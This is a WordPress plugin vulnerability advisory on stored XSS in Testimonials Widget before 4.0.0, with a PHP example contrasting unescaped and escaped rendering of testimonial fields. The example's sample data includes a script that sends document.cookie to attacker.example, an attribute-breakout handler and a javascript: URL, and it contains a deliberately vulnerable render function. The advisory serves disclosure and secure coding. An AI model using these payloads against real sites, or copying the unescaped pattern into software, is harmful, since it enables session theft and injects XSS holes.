WordPress Plugin Vulnerabilities
Testimonials Widget < 4.0.0 - Multiple Authenticated Stored XSS
Description
Multiple stored cross-site scripting vulnerabilities in Testimonials Widget 3.5.1 and lower allow authenticated users with the Contributor role or higher to inject arbitrary JavaScript or HTML via the following testimonial fields:
- Author
- Job Title
- Location
- Company
- Email
- URL
Successful exploitation allows an authenticated, medium-privileged user (Contributor or higher) to inject arbitrary JavaScript or HTML that is stored with the testimonial and executed in the browser of every user who visits a page displaying it. Note: testimonials added by a Contributor go through a manual review process before they are published.
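To make the issue concrete, the following is an added illustration (not the plugin's own code) of the pattern behind this class of bug: testimonial fields written into the page without escaping, next to the same rendering with context-specific escaping. The field names follow the advisory; the $testimonial array shape, the two render functions, and the sample payloads are constructed for this example. The esc_html(), esc_attr() and esc_url() stand-ins exist only so the file runs outside WordPress, where the core functions of the same name would be used.

```php
<?php
// Added example, not code from Testimonials Widget. Shows why field values
// saved by a Contributor must be escaped for their output context.

// Minimal stand-ins so this runs outside WordPress (assumption: in a real
// plugin the WordPress core esc_html/esc_attr/esc_url are used instead).
if (!function_exists('esc_html')) {
    function esc_html(string $s): string {
        return htmlspecialchars($s, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    }
}
if (!function_exists('esc_attr')) {
    function esc_attr(string $s): string {
        return htmlspecialchars($s, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    }
}
if (!function_exists('esc_url')) {
    // Simplified scheme allow-list; WordPress' esc_url() similarly returns ''
    // for URLs whose protocol is not in wp_allowed_protocols().
    function esc_url(string $s): string {
        $s = trim($s);
        if (!preg_match('#^(https?://|mailto:)#i', $s)) {
            return '';
        }
        return htmlspecialchars($s, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    }
}

// Constructed sample: what a Contributor could save in the testimonial fields.
$testimonial = [
    'author'    => 'Alice <script>document.location="https://attacker.example/?c="+document.cookie</script>',
    'job_title' => 'CTO" onmouseover="alert(1)',
    'location'  => 'Berlin',
    'company'   => 'Example GmbH',
    'email'     => 'alice@example.com',
    'url'       => 'javascript:alert(document.domain)',
];

// Vulnerable pattern: values are concatenated straight into HTML, so the
// stored <script> in "author", the attribute breakout in "job_title" and the
// javascript: URL all reach every visitor's browser unchanged.
function render_testimonial_vulnerable(array $t): string {
    return '<div class="testimonial">'
         . '<span class="author">' . $t['author'] . '</span>, '
         . '<span class="title" data-title="' . $t['job_title'] . '">' . $t['job_title'] . '</span> at '
         . '<a href="' . $t['url'] . '">' . $t['company'] . '</a> ('
         . $t['location'] . ') - '
         . '<a href="mailto:' . $t['email'] . '">' . $t['email'] . '</a>'
         . '</div>';
}

// Hardened pattern: escape each value for the context it lands in
// (text node: esc_html, attribute value: esc_attr, href: esc_url).
function render_testimonial_safe(array $t): string {
    return '<div class="testimonial">'
         . '<span class="author">' . esc_html($t['author']) . '</span>, '
         . '<span class="title" data-title="' . esc_attr($t['job_title']) . '">' . esc_html($t['job_title']) . '</span> at '
         . '<a href="' . esc_url($t['url']) . '">' . esc_html($t['company']) . '</a> ('
         . esc_html($t['location']) . ') - '
         . '<a href="' . esc_url('mailto:' . $t['email']) . '">' . esc_html($t['email']) . '</a>'
         . '</div>';
}

echo "VULNERABLE:\n" . render_testimonial_vulnerable($testimonial) . "\n\n";
echo "HARDENED:\n" . render_testimonial_safe($testimonial) . "\n";
```

Run it with `php example.php` and compare the two outputs: in the hardened version the script tag becomes inert text, the quote in the job title cannot close the attribute, and the javascript: URL is dropped from the href. Escaping at output is the primary fix because a Contributor does not hold the unfiltered_html capability and must never be able to add markup; sanitising the fields on save (for example with sanitize_text_field()) is worthwhile defence in depth but does not replace it.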
May 9th, 2020 - Confirmed & Escalated to WP Plugins Team
May 11th, 2020 - WP Plugins Team Investigating
July 3rd, 2020 - No updates, releasing.
July 12th, 2020 - v4.0.0 released, fixing the issues.
Proof of Concept
Affects Plugins
References
CVE
Classification
Type
XSS
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Nguyen Anh Tien - SunCSR (Sun* Cyber Security Research)
Submitter
Nguyen Anh Tien
Submitter website
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2020-07-03
Added
2020-07-03
Last Updated
2021-01-23